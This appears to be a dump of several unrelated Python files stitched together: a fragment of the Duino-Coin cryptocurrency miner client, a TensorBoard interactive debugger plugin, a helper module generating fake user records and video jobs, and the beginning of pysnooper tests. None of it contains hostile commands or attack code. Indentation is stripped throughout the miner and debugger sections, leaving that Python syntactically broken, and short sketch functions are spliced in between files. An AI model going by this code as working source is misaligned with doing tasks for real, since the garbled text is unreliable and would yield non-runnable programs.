"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
sleep(5)
break
except Exception as e:
# Socket connection error
pretty_print(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
pretty_print(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
pretty_print("cpu" + str(threadid),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
                    # Calculate total hashrate of all threads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
                        responsetimestart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
                        ping = int((responsetimestop - responsetimestart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
pretty_print("sys0",
" " +
getString("max_hashrate_notice"),
"warning")
diff = get_prefix(diff)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ⛏"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ⛏"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = accepted.value - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
totalhashrate,
uptime)
start_time = time()
break
break
except Exception as e:
pretty_print(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" Periodic mining report (BETA): "
+ Fore.RESET
+ Style.NORMAL
+ "\n\t\t‖ During the last "
+ str(seconds)
+ " seconds"
+ "\n\t\t‖ You've mined "
+ str(shares)
+ " shares ("
+ str(round(shares/seconds, 1))
+ " shares/s)"
+ "\n\t\t‖ With the hashrate of "
+ str(int(hashrate)) + " kH/s"
+ "\n\t\t‖ In this time period, you've solved "
+ str(int(hashrate*seconds))
+ " hashes"
+ "\n\t\t‖ Total miner uptime: "
+ str(uptime), "success")
def pretty_print(message_type, message, state):
# Prints colored output messages
# Usb/net/sys background
if message_type.startswith("net"):
background = Back.BLUE
elif message_type.startswith("cpu"):
background = Back.YELLOW
if message_type.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ message_type
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
def get_fastest_connection(server_ip: str):
connection_pool = []
available_connections = []
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(5).decode()
except:
continue
            if server_version == '':
continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(4)
return ready_connections[0].getpeername()[1]
def fetch_pools():
while True:
pretty_print("net0",
" "
+ getString("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
pretty_print("net0",
" Retrieved mining node: "
+ Fore.RESET
+ Style.NORMAL
+ str(response["name"]),
"success")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
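# Illustrative sketch (not called anywhere): fetch_pools returns an (ip, port)
# pair parsed from the getPool JSON response; the fallback below mirrors the
# defaults used in the __main__ block further down.
def _example_fetch_node():
    try:
        return fetch_pools()
    except Exception:
        return "server.duinocoin.com", 2813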
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
title(getString("duco_python_miner") + str(MINER_VER) + ")")
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True)
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
pretty_print(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
pretty_print(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
pretty_print(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except:
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS,
NODE_PORT))
thread[x].start()
if x > 4 and x % 4 == 0:
# Don't launch burst of threads
# to not get banned
sleep(5)
else:
sleep(0.1)
except Exception as e:
pretty_print(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
interactive_debugger_plugin.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The plugin for the interactive Debugger Dashboard."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import platform
import signal
import sys
import threading
from six.moves import xrange # pylint:disable=redefined-builtin
import tensorflow as tf
from werkzeug import wrappers
from tensorboard.backend import http_util
from tensorboard.plugins import base_plugin
from tensorboard.plugins.debugger import constants
from tensorboard.plugins.debugger import interactive_debugger_server_lib
from tensorboard.util import tb_logging
logger = tb_logging.get_logger()
# HTTP routes.
_ACK_ROUTE = '/ack'
_COMM_ROUTE = '/comm'
_DEBUGGER_GRAPH_ROUTE = '/debugger_graph'
_DEBUGGER_GRPC_HOST_PORT_ROUTE = '/debugger_grpc_host_port'
_GATED_GRPC_ROUTE = '/gated_grpc'
_TENSOR_DATA_ROUTE = '/tensor_data'
_SOURCE_CODE_ROUTE = '/source_code'
class InteractiveDebuggerPlugin(base_plugin.TBPlugin):
"""Interactive TensorFlow Debugger plugin.
This underlies the interactive Debugger Dashboard.
This is different from the non-interactive `DebuggerPlugin` in module
`debugger_plugin`. The latter is for the "health pills" feature in the Graph
Dashboard.
"""
# This string field is used by TensorBoard to generate the paths for routes
# provided by this plugin. It must thus be URL-friendly. This field is also
# used to uniquely identify this plugin throughout TensorBoard. See BasePlugin
# for details.
plugin_name = constants.DEBUGGER_PLUGIN_NAME
def __init__(self, context):
"""Constructs a debugger plugin for TensorBoard.
This plugin adds handlers for retrieving debugger-related data. The plugin
also starts a debugger data server once the log directory is passed to the
plugin via the call to get_plugin_apps.
Args:
context: A base_plugin.TBContext instance.
"""
del context # Unused.
self._debugger_data_server = None
self._server_thread = None
self._grpc_port = None
def listen(self, grpc_port):
"""Start listening on the given gRPC port.
This method of an instance of InteractiveDebuggerPlugin can be invoked at
most once. This method is not thread safe.
Args:
grpc_port: port number to listen at.
Raises:
ValueError: If this instance is already listening at a gRPC port.
"""
if self._grpc_port:
raise ValueError(
'This InteractiveDebuggerPlugin instance is already listening at '
'gRPC port %d' % self._grpc_port)
self._grpc_port = grpc_port
sys.stderr.write('Creating InteractiveDebuggerPlugin at port %d\n' %
self._grpc_port)
sys.stderr.flush()
self._debugger_data_server = (
interactive_debugger_server_lib.InteractiveDebuggerDataServer(
self._grpc_port))
self._server_thread = threading.Thread(
target=self._debugger_data_server.run_server)
self._server_thread.start()
signal.signal(signal.SIGINT, self.signal_handler)
# Note: this is required because of a wontfix issue in grpc/python 2.7:
# https://github.com/grpc/grpc/issues/3820
def signal_handler(self, unused_signal, unused_frame):
if self._debugger_data_server and self._server_thread:
print('Stopping InteractiveDebuggerPlugin...')
# Enqueue a number of messages to the incoming message queue to try to
# let the debugged tensorflow runtime proceed past the current Session.run
# in the C++ layer and return to the Python layer, so the SIGINT handler
# registered there may be triggered.
for _ in xrange(len(self._debugger_data_server.breakpoints) + 1):
self._debugger_data_server.put_incoming_message(True)
try:
self._debugger_data_server.stop_server()
except ValueError:
# In case the server has already stopped running.
pass
self._server_thread.join()
print('InteractiveDebuggerPlugin stopped.')
sys.exit(0)
def get_plugin_apps(self):
"""Obtains a mapping between routes and handlers.
This function also starts a debugger data server on separate thread if the
plugin has not started one yet.
Returns:
A mapping between routes and handlers (functions that respond to
requests).
"""
return {
_ACK_ROUTE: self._serve_ack,
_COMM_ROUTE: self._serve_comm,
_DEBUGGER_GRPC_HOST_PORT_ROUTE: self._serve_debugger_grpc_host_port,
_DEBUGGER_GRAPH_ROUTE: self._serve_debugger_graph,
_GATED_GRPC_ROUTE: self._serve_gated_grpc,
_TENSOR_DATA_ROUTE: self._serve_tensor_data,
_SOURCE_CODE_ROUTE: self._serve_source_code,
}
def is_active(self):
"""Determines whether this plugin is active.
This plugin is active if any health pills information is present for any
run.
Returns:
A boolean. Whether this plugin is active.
"""
return self._grpc_port is not None
def frontend_metadata(self):
# TODO(#2338): Keep this in sync with the `registerDashboard` call
# on the frontend until that call is removed.
return base_plugin.FrontendMetadata(element_name='tf-debugger-dashboard')
@wrappers.Request.application
def _serve_ack(self, request):
# Send client acknowledgement. `True` is just used as a dummy value.
self._debugger_data_server.put_incoming_message(True)
return http_util.Respond(request, {}, 'application/json')
@wrappers.Request.application
def _serve_comm(self, request):
# comm_channel.get() blocks until an item is put into the queue (by
# self._debugger_data_server). This is how the HTTP long polling ends.
pos = int(request.args.get("pos"))
comm_data = self._debugger_data_server.get_outgoing_message(pos)
return http_util.Respond(request, comm_data, 'application/json')
@wrappers.Request.application
def _serve_debugger_graph(self, request):
device_name = request.args.get('device_name')
if not device_name or device_name == 'null':
return http_util.Respond(request, str(None), 'text/x-protobuf')
run_key = interactive_debugger_server_lib.RunKey(
*json.loads(request.args.get('run_key')))
graph_def = self._debugger_data_server.get_graph(run_key, device_name)
logger.debug(
'_serve_debugger_graph(): device_name = %s, run_key = %s, '
'type(graph_def) = %s', device_name, run_key, type(graph_def))
# TODO(cais): Sending text proto may be slow in Python. Investigate whether
# there are ways to optimize it.
return http_util.Respond(request, str(graph_def), 'text/x-protobuf')
def _error_response(self, request, error_msg):
logger.error(error_msg)
return http_util.Respond(
request, {'error': error_msg}, 'application/json', 400)
@wrappers.Request.application
def _serve_gated_grpc(self, request):
mode = request.args.get('mode')
if mode == 'retrieve_all' or mode == 'retrieve_device_names':
# 'retrieve_all': Retrieve all gated-gRPC debug tensors and currently
# enabled breakpoints associated with the given run_key.
# 'retrieve_device_names': Retrieve all device names associated with the
# given run key.
run_key = interactive_debugger_server_lib.RunKey(
*json.loads(request.args.get('run_key')))
# debug_graph_defs is a map from device_name to GraphDef.
debug_graph_defs = self._debugger_data_server.get_graphs(run_key,
debug=True)
if mode == 'retrieve_device_names':
return http_util.Respond(request, {
'device_names': list(debug_graph_defs.keys()),
}, 'application/json')
gated = {}
for device_name in debug_graph_defs:
gated[device_name] = self._debugger_data_server.get_gated_grpc_tensors(
run_key, device_name)
# Both gated and self._debugger_data_server.breakpoints are lists whose
# items are (node_name, output_slot, debug_op_name).
return http_util.Respond(request, {
'gated_grpc_tensors': gated,
'breakpoints': self._debugger_data_server.breakpoints,
'device_names': list(debug_graph_defs.keys()),
}, 'application/json')
elif mode == 'breakpoints':
# Retrieve currently enabled breakpoints.
return http_util.Respond(
request, self._debugger_data_server.breakpoints, 'application/json')
elif mode == 'set_state':
# Set the state of gated-gRPC debug tensors, e.g., disable, enable
# breakpoint.
node_name = request.args.get('node_name')
output_slot = int(request.args.get('output_slot'))
debug_op = request.args.get('debug_op')
state = request.args.get('state')
logger.debug('Setting state of %s:%d:%s to: %s' %
(node_name, output_slot, debug_op, state))
if state == 'disable':
self._debugger_data_server.request_unwatch(
node_name, output_slot, debug_op)
elif state == 'watch':
self._debugger_data_server.request_watch(
node_name, output_slot, debug_op, breakpoint=False)
elif state == 'break':
self._debugger_data_server.request_watch(
node_name, output_slot, debug_op, breakpoint=True)
else:
return self._error_response(
request, 'Unrecognized new state for %s:%d:%s: %s' % (node_name,
output_slot,
debug_op,
state))
return http_util.Respond(
request,
{'node_name': node_name,
'output_slot': output_slot,
'debug_op': debug_op,
'state': state},
'application/json')
else:
return self._error_response(
request, 'Unrecognized mode for the gated_grpc route: %s' % mode)
@wrappers.Request.application
def _serve_debugger_grpc_host_port(self, request):
return http_util.Respond(
request,
{'host': platform.node(), 'port': self._grpc_port}, 'application/json')
@wrappers.Request.application
def _serve_tensor_data(self, request):
response_encoding = 'application/json'
watch_key = request.args.get('watch_key')
time_indices = request.args.get('time_indices')
mapping = request.args.get('mapping')
slicing = request.args.get('slicing')
try:
sliced_tensor_data = self._debugger_data_server.query_tensor_store(
watch_key, time_indices=time_indices, slicing=slicing,
mapping=mapping)
response = {
'tensor_data': sliced_tensor_data,
'error': None
}
status_code = 200
except (IndexError, ValueError) as e:
response = {
'tensor_data': None,
'error': {
'type': type(e).__name__,
},
}
# TODO(cais): Provide safe and succinct error messages for common error
# conditions, such as index out of bound, or invalid mapping for given
# tensor ranks.
status_code = 500
return http_util.Respond(request, response, response_encoding, status_code)
@wrappers.Request.application
def _serve_source_code(self, request):
response_encoding = 'application/json'
mode = request.args.get('mode')
if mode == 'paths':
# Retrieve all file paths.
response = {'paths': self._debugger_data_server.query_source_file_paths()}
return http_util.Respond(request, response, response_encoding)
elif mode == 'content':
# Retrieve the content of a source file.
file_path = request.args.get('file_path')
response = {
'content': {
file_path: self._debugger_data_server.query_source_file_content(
file_path)},
'lineno_to_op_name_and_stack_pos':
self._debugger_data_server.query_file_tracebacks(file_path)}
return http_util.Respond(request, response, response_encoding)
elif mode == 'op_traceback':
# Retrieve the traceback of a graph op by name of the op.
op_name = request.args.get('op_name')
response = {
'op_traceback': {
op_name: self._debugger_data_server.query_op_traceback(op_name)
}
}
return http_util.Respond(request, response, response_encoding)
else:
response = {'error': 'Invalid mode for source_code endpoint: %s' % mode}
      return http_util.Respond(request, response, response_encoding, 500)
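# Illustrative usage sketch (not called anywhere in this module): TensorBoard
# normally constructs the plugin itself; listen() may be invoked at most once
# to start the debugger data server. The port number is an arbitrary example.
def _example_listen(context, grpc_port=6064):
  plugin = InteractiveDebuggerPlugin(context)
  plugin.listen(grpc_port)
  return plugin.get_plugin_apps()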
|
helpers.py
|
# -*- coding: utf-8 -*-
"""
Random user endpoint.
Using Mimesis example for this: https://bit.ly/37KUAlo
"""
import emoji
from mimesis import Generic
from mimesis.enums import Gender
from mimesis.schema import Field, Schema
import pytube
from google.cloud import storage
import os
import random
import string
import json
import urllib.request
from script import *
from util import *
import multiprocessing
import uuid
_ = Field("en")
random_users = Schema(
lambda: {
"id": _("uuid"),
"name": _("name", gender=Gender.MALE),
"surname": _("surname", gender=Gender.MALE),
"email": _("email"),
"age": _("age"),
"username": _("username", template="UU_d"),
"occupation": _("occupation"),
"address": {
"street": _("street_name"),
"city": _("city"),
"zipcode": _("zip_code"),
},
},
)
g = Generic("en") # Going to stick with American English.
def passwd(length: int = 8, hash: bool = False) -> str:
"""
Helper function to generate a random password.
"""
return g.person.password(length=length, hashed=hash)
def emojis() -> str:
"""
    Helper function to create a random emoji.
"""
return emoji.emojize(g.internet.emoji(), use_aliases=True)
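# Illustrative sketch (not called anywhere): combining the helpers above to
# decorate a user dict with a hashed password and a random emoji.
def _example_decorated_user(user: dict) -> dict:
    user["password"] = passwd(length=12, hash=True)
    user["status_emoji"] = emojis()
    return user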
def vid_maker(vid_id, start_time, end_time, user_id):
work_id = str(uuid.uuid4())
print('work id is: ', work_id)
multiprocessing.Process(target=main_func, args=(vid_id, start_time, end_time, user_id, str(work_id))).start()
return {
'work_id': work_id
}
def vid_status_checker(work_id):
result = check_gsheet_db(work_id)
return {
'status': result['status'],
'file_url': result['file_url']
}
|
test_pysnooper.py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import io
import textwrap
import threading
import types
import os
import sys
from pysnooper.utils import truncate
import pytest
import pysnooper
from pysnooper.variables import needs_parentheses
from .utils import (assert_output, assert_sample_output, VariableEntry,
CallEntry, LineEntry, ReturnEntry, OpcodeEntry,
ReturnValueEntry, ExceptionEntry, SourcePathEntry)
from . import mini_toolbox
def test_string_io():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function('baba')
assert result == 15
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_multi_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
def parse_call_content(line):
return line.split('{event:9} '.format(event='call'))[-1]
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
my_function('baba')
t1 = threading.Thread(target=my_function, name="test123",args=['bubu'])
t1.start()
t1.join()
t1 = threading.Thread(target=my_function, name="bibi",args=['bibi'])
t1.start()
t1.join()
output = output_capturer.string_io.getvalue()
calls = [line for line in output.split("\n") if "call" in line]
main_thread = calls[0]
assert parse_call_content(main_thread) == parse_call_content(calls[1])
assert parse_call_content(main_thread) == parse_call_content(calls[2])
thread_info_regex = '([0-9]+-{name}+[ ]+)'
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="MainThread")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'bubu'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(
name="test123")),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(
name="test123")),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(
name="test123")),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
VariableEntry('foo', value_regex="u?'bibi'"),
CallEntry('def my_function(foo):',
thread_info_regex=thread_info_regex.format(name='bibi')),
LineEntry('x = 7',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('x', '7'),
LineEntry('y = 8',
thread_info_regex=thread_info_regex.format(name='bibi')),
VariableEntry('y', '8'),
LineEntry('return y + x',
thread_info_regex=thread_info_regex.format(name='bibi')),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
@pytest.mark.parametrize("normalize", (True, False))
def test_callable(normalize):
string_io = io.StringIO()
def write(msg):
string_io.write(msg)
@pysnooper.snoop(write, normalize=normalize)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_watch(normalize):
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@pysnooper.snoop(watch=(
'foo.x',
'io.__name__',
'len(foo.__dict__["x"] * "abc")',
), normalize=normalize)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('Foo'),
VariableEntry('io.__name__', "'io'"),
CallEntry('def my_function():'),
LineEntry('foo = Foo()'),
VariableEntry('foo'),
VariableEntry('foo.x', '2'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '6'),
LineEntry(),
VariableEntry('i', '0'),
LineEntry(),
VariableEntry('foo.x', '4'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '12'),
LineEntry(),
VariableEntry('i', '1'),
LineEntry(),
VariableEntry('foo.x', '16'),
VariableEntry('len(foo.__dict__["x"] * "abc")', '48'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('None')
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_watch_explode(normalize):
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
